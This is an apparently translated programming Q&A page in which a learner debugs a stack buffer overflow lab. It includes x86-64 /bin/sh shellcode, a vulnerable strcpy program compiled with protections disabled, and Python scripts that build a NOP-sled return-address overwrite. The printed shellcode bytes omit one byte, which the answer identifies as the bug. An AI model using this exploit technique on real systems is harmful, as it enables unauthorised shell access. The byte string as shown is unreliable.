ubuntu - 执行一个shellcode,/bin/sh
问题描述
我正在尝试/bin/sh从堆栈上的地址执行 shellcode (),但未成功。我在 Ubuntu 20.04 64 位机器上使用缓冲区溢出方法将 shellcode 注入可执行文件。我希望在执行过程中,会打开一个外壳......
- 这是执行的程序集文件
/bin/sh(我从中获取机器代码):
global _start
_start:
xor rax, rax
push rax
mov rbx, 0x68732f6e69622f2f
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi,rsp
xor rdx, rdx
add rax, 59
syscall
- 这是机器代码:
\x48\x31\xc0\x50\x48\xbb\x2f\x2f\x62\x69\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05
- 这是我注入 shellcode 的 C 代码 (
buffer_V8.c):
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int buffer(char* input){
char buffer[256];
strcpy (buffer,input);
printf("Hello from buffer!\n");
return 0;
}
void main (int argc, char *argv[]){
int local_variable = 1;
buffer(argv[1]);
printf("Hello from main!\n");
exit(0);
}
- 这就是我创建可执行文件的方式:
gcc -fno-stack-protector -z execstack buffer_V8.c -o buffer_V8
- 使用合法输入运行可执行文件,按预期工作:
$ ./buffer_V8 AAA
Hello from buffer!
Hello from main!
- 使用 GDB 运行可执行文件,使用长输入覆盖返回地址,但没有 shellcode,按预期工作:
这是创建输入的文件:
#!/usr/bin/env python
from struct import *
buffer = ""
buffer += "A"*264
buffer += "B"*6
f = open("input_V1.txt", "w")
f.write(buffer)
f.close()
这是使用 GDB 执行的结果:当调试器尝试返回时,它会停止并显示以下消息:
gdb ./buffer_V8
run $(cat input_V1.txt)
c
…
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()
- 使用 GDB 运行可执行文件,使用覆盖返回地址的长输入(包括 shellcode)无法按预期工作:
这是创建输入的文件:
#!/usr/bin/env python
from struct import *
buffer = ""
buffer += "\x90"*100 #NOP
#shell code
buffer+="\x48\x31\xc0\x50\x48\xbb\x2f\x2f\x62\x69\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05"
buffer += "C"*133
#override the return address with an address in the stack inside the buffer before the shellcode begins.
buffer += pack("<Q", 0x7fffffffdcf0)
f = open("input_V4.txt", "w")
f.write(buffer)
f.close()
下面是使用 GDB 执行的结果:
gdb ./buffer_V8
run $(cat input_V4.txt)
c
0x7fffffffdd3a: xor rdx,rdx
0x7fffffffdd3d: add rax,0x3b
0x7fffffffdd41: syscall
=> **0x7fffffffdd43**: rex.XB
0x7fffffffdd44: rex.XB
0x7fffffffdd45: rex.XB
0x7fffffffdd46: rex.XB
0x7fffffffdd47: rex.XB
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffddb8 --> 0x7fffffffddc8 --> 0x0
0008| 0x7fffffffddc0 --> 0x0
0016| 0x7fffffffddc8 --> 0x0
0024| 0x7fffffffddd0 --> 0x7fffffffdee8 --> 0x7fffffffe22f ("/home/albi/Desktop/UMalware/PROJECTS
/Penetration/CH7/zzz")
0032| 0x7fffffffddd8 --> 0x2555550a0
0040| 0x7fffffffdde0 --> 0x7fffffffdee0 --> 0x2
0048| 0x7fffffffdde8 --> 0x100000000
0056| 0x7fffffffddf0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
**0x00007fffffffdd43** in ?? ()
而不是打开一个shell,看起来执行在调用之后停止了syscall at address 0x7fffffffdd41。
出了什么问题,如何成功执行 shellcode?
非常感谢大理
解决方案
我发现了这个错误:
从第 1 阶段:汇编程序到第 2 阶段:机器代码的过渡并不完整:缺少一个机器代码。
解决这个问题解决了一切!
推荐阅读
- java - Java regex:查找字母数字组合的序列,允许某些符号
- python - Maya python commands to Maya api: modelEditor settings
- c# - Correct way to enable and disable voice recording via Bluetooth headset on Xamarin.Android
- android - Autofill in Android Oreo not working when app handles localization
- java - When I send a socket request to nginx, the request from nginx is not balanced to socket server
- ionic3 - File-Encryption is not working in ionic 3
- visual-studio - Depend on DLL without header file, worked in Visual Studio 2005
- mysql - How can I Insert data to my table from a comma separated text?
- html - (asp.net) Bootstrap 4 导航栏切换器不工作
- c# - 代码可维护性索引中的 InitializeComponent()